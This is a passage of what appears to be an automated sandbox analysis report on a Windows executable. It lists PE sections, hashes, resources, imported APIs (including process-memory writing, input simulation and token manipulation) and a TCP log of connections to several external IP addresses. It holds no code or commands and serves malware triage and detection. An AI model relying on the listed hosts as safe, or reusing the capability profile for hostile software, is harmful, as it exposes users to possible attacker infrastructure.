                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                Sections

                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .rsrc0xc40000x6054c0x6060001c95274e1e27df77cf2eb991c0fd927False0.9320104774643321data7.9032014799354275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .reloc0x1250000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                Resources

                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                                RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                                RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                                RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                                RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                                RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                                RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                                RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                                RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                                                                                RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                                RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                                RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                                RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                                RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                                RT_RCDATA0xcc7b80x57851data1.0003235875820475
                                                                                                                                RT_GROUP_ICON0x12400c0x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                                RT_GROUP_ICON0x1240840x14dataEnglishGreat Britain1.25
                                                                                                                                RT_GROUP_ICON0x1240980x14dataEnglishGreat Britain1.15
                                                                                                                                RT_GROUP_ICON0x1240ac0x14dataEnglishGreat Britain1.25
                                                                                                                                RT_VERSION0x1240c00xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                RT_MANIFEST0x12419c0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                                                                                Imports

                                                                                                                                DLLImport
                                                                                                                                WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                                                                VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                                                                MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                                                                PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                                USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                                UxTheme.dllIsThemeActive
                                                                                                                                KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                                                                USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                                                                GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                                                                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                                                OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                                                                                Possible Origin

                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                EnglishGreat Britain

                                                                                                                                Network Behavior

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Nov 18, 2024 16:25:29.383744955 CET4982980192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:25:29.392854929 CET80498293.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:29.393033981 CET4982980192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:25:29.400605917 CET4982980192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:25:29.408891916 CET80498293.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:30.979819059 CET80498293.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:31.009700060 CET80498293.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:31.009906054 CET4982980192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:25:31.011344910 CET4982980192.168.2.63.33.130.190
                                                                                                                                Nov 18, 2024 16:25:31.016375065 CET80498293.33.130.190192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:46.110815048 CET4990880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:46.115973949 CET8049908217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:46.116182089 CET4990880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:46.126424074 CET4990880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:46.131611109 CET8049908217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:46.930119991 CET8049908217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:46.981053114 CET4990880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:47.038959980 CET8049908217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:47.039033890 CET4990880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:47.637897015 CET4990880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:48.656563997 CET4992380192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:48.661828995 CET8049923217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:48.661997080 CET4992380192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:48.672698975 CET4992380192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:48.677707911 CET8049923217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:49.506694078 CET8049923217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:49.559194088 CET4992380192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:49.615385056 CET8049923217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:49.615437031 CET4992380192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:50.184540987 CET4992380192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:51.203341961 CET4993880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:51.208312988 CET8049938217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:51.208400965 CET4993880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:51.218940020 CET4993880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:51.223851919 CET8049938217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:51.224118948 CET8049938217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:52.011579037 CET8049938217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:52.059170008 CET4993880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:52.120218992 CET8049938217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:52.120332956 CET4993880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:52.731183052 CET4993880192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:53.935996056 CET4995280192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:53.941158056 CET8049952217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:53.941257000 CET4995280192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:53.947909117 CET4995280192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:53.952914953 CET8049952217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:54.789060116 CET8049952217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:54.789132118 CET8049952217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:54.789165020 CET8049952217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:54.789195061 CET8049952217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:54.789227962 CET4995280192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:54.789378881 CET4995280192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:54.897955894 CET8049952217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:25:54.898155928 CET4995280192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:54.899040937 CET4995280192.168.2.6217.70.184.50
                                                                                                                                Nov 18, 2024 16:25:54.904069901 CET8049952217.70.184.50192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:00.059786081 CET4998680192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:00.064893961 CET8049986199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:00.064960003 CET4998680192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:00.157017946 CET4998680192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:00.162372112 CET8049986199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:00.735748053 CET8049986199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:00.735800982 CET8049986199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:00.735882998 CET4998680192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:00.736577988 CET8049986199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:00.738082886 CET4998680192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:01.668816090 CET4998680192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:02.694153070 CET4998980192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:02.699451923 CET8049989199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:02.699673891 CET4998980192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:02.709602118 CET4998980192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:02.714663982 CET8049989199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:03.375417948 CET8049989199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:03.375438929 CET8049989199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:03.375499010 CET4998980192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:03.375861883 CET8049989199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:03.375905037 CET4998980192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:04.215734959 CET4998980192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:05.235471964 CET4999080192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:05.240434885 CET8049990199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:05.240559101 CET4999080192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:05.250812054 CET4999080192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:05.255948067 CET8049990199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:05.255959988 CET8049990199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:05.888365984 CET8049990199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:05.888410091 CET8049990199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:05.888539076 CET4999080192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:05.888768911 CET8049990199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:05.888823986 CET4999080192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:06.765655994 CET4999080192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:07.781358957 CET4999280192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:07.786432028 CET8049992199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:07.786515951 CET4999280192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:07.793571949 CET4999280192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:07.798347950 CET8049992199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:08.490135908 CET8049992199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:08.490158081 CET8049992199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:08.490291119 CET4999280192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:08.522207975 CET8049992199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:08.522377014 CET4999280192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:08.523435116 CET4999280192.168.2.6199.59.243.227
                                                                                                                                Nov 18, 2024 16:26:08.528491020 CET8049992199.59.243.227192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:21.640192986 CET4999480192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:21.645360947 CET8049994209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:21.645560026 CET4999480192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:21.658533096 CET4999480192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:21.663580894 CET8049994209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:22.389053106 CET8049994209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:22.434575081 CET4999480192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:22.443768978 CET8049994209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:22.444684982 CET4999480192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:23.168860912 CET4999480192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:24.187604904 CET4999580192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:24.192714930 CET8049995209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:24.192806005 CET4999580192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:24.204941034 CET4999580192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:24.210025072 CET8049995209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:24.939470053 CET8049995209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:24.988235950 CET4999580192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:24.993673086 CET8049995209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:24.993809938 CET4999580192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:25.715838909 CET4999580192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:26.739618063 CET4999680192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:26.744559050 CET8049996209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:26.746294975 CET4999680192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:26.756552935 CET4999680192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:26.761663914 CET8049996209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:26.761719942 CET8049996209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:27.462975025 CET8049996209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:27.512406111 CET4999680192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:27.517385960 CET8049996209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:27.517435074 CET4999680192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:28.262490988 CET4999680192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:29.281296968 CET4999780192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:29.286242008 CET8049997209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:29.289930105 CET4999780192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:29.300158978 CET4999780192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:29.305449009 CET8049997209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:30.009793043 CET8049997209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:30.059464931 CET4999780192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:30.065622091 CET8049997209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:30.065773964 CET4999780192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:30.066709042 CET4999780192.168.2.6209.74.64.58
                                                                                                                                Nov 18, 2024 16:26:30.071573973 CET8049997209.74.64.58192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:35.809003115 CET4999980192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:35.814174891 CET804999947.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:35.814246893 CET4999980192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:35.826802969 CET4999980192.168.2.647.242.89.146
                                                                                                                                Nov 18, 2024 16:26:35.832047939 CET804999947.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:36.860110998 CET804999947.242.89.146192.168.2.6
                                                                                                                                Nov 18, 2024 16:26:36.981200933 CET4999980192.168.2.647.242.89.146
